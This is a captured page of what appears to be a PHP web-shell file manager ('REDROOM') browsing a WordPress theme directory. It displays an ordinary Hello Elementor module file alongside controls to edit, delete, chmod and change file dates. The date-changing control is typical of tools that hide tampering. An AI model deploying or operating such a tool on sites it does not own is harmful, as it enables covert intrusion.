REDROOM
PHP 8.0.30
Path:
Logout
Edit File
Size: 662 B
Close
/home/certprox/test.certproxywizard.com/wp-content/themes/hello-elementor/modules/admin-home/module.php
Text
Base64
<?php namespace HelloTheme\Modules\AdminHome; use HelloTheme\Includes\Module_Base; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * class Module * * @package HelloPlus * @subpackage HelloPlusModules */ class Module extends Module_Base { /** * @inheritDoc */ public static function get_name(): string { return 'admin-home'; } /** * @inheritDoc */ protected function get_component_ids(): array { return [ 'Admin_Menu_Controller', 'Scripts_Controller', 'Api_Controller', 'Ajax_Handler', 'Conversion_Banner', 'Admin_Top_Bar', 'Settings_Controller', 'Notificator', 'Finder', ]; } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 2 × Files: 1
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
components
DIR
-
drwxr-xr-x
2026-01-11 22:23:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
rest
DIR
-
drwxr-xr-x
2026-01-11 22:23:24
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
module.php
662 B
lrw-r--r--
2026-03-01 08:58:01
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).